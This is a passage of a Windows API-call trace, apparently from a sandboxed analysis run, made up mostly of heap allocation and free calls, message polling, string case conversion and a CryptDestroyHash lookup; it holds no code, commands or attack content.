Size=0x10) returned 0x24a9678 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0267.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0267.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0267.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0267.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0267.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0267.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0267.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0267.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0267.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0267.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0267.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0267.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0267.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0267.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0267.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0267.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0267.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0267.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0267.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0267.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.995] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0267.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0267.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0267.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.998] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.998] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.998] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.999] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.999] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0268.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0268.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0268.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0268.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0268.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0268.001] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0268.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0268.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0268.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0268.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0268.001] CryptDestroyHash (hHash=0xaa5860) returned 1 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0268.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0268.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0268.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0268.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: 